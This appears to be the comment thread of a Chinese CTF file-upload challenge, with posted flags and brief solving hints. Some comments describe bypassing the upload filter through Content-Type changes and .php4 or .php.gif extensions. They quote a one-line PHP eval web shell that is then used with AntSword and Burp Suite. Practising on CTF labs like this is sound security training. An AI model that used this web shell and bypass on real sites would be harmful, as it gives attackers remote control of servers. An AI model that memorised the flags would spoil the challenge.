为什么报You was catched! :) 。。。。。。
flag{bd0c655bcd2b2676c25b9b9dfbac2181}
flag{01b6ad6be2af70f83f2c9282ad8d34c1}
123.php.gif contenttype image/gif
怎么连上去打不开flag啊
flag{de5fd002182dd65121054872ac5570f0}
这个题较为好做,看到题目为文件上传想到需要BP去改包,将请求头的type,文件后缀,请求数据的type,进行更改,上传后返回路径,用蚁?直接连接,记得把代理关掉,不然不成功。
1.请求头部的 Content-Type:mulTIPart/form-data 2.文件后缀: .php4 3.请求数据的Content-Type:image/jpeg 4.一句话: <?php eval($_POST['cmd']); ?> 5.蚁剑:根目录
这题目现在改了吗?蚁剑连不了jpg,改成.php4,没改Content-Type就能连蚁剑了(显示valid file但是能连),一改Content-Type下面burpsuit字体就变蓝,连不了
...
评论
ssspeter 17天前
举报
为什么报You was catched! :) 。。。。。。
MANAN 18天前
举报
flag{bd0c655bcd2b2676c25b9b9dfbac2181}
zhuohao 22天前
举报
flag{01b6ad6be2af70f83f2c9282ad8d34c1}
合肥徐总 4月前
举报
123.php.gif contenttype image/gif
jingquesec 5月前
举报
flag{01b6ad6be2af70f83f2c9282ad8d34c1}
Wchzzz 7月前
举报
怎么连上去打不开flag啊
1004025151 7月前
举报
flag{de5fd002182dd65121054872ac5570f0}
冯飞99 11月前
举报
这个题较为好做,看到题目为文件上传想到需要BP去改包,将请求头的type,文件后缀,请求数据的type,进行更改,上传后返回路径,用蚁?直接连接,记得把代理关掉,不然不成功。
zzccbb2005 11月前
举报
1.请求头部的 Content-Type:mulTIPart/form-data 2.文件后缀: .php4 3.请求数据的Content-Type:image/jpeg 4.一句话: <?php eval($_POST['cmd']); ?> 5.蚁剑:根目录
wjx2958958 12月前
举报
这题目现在改了吗?蚁剑连不了jpg,改成.php4,没改Content-Type就能连蚁剑了(显示valid file但是能连),一改Content-Type下面burpsuit字体就变蓝,连不了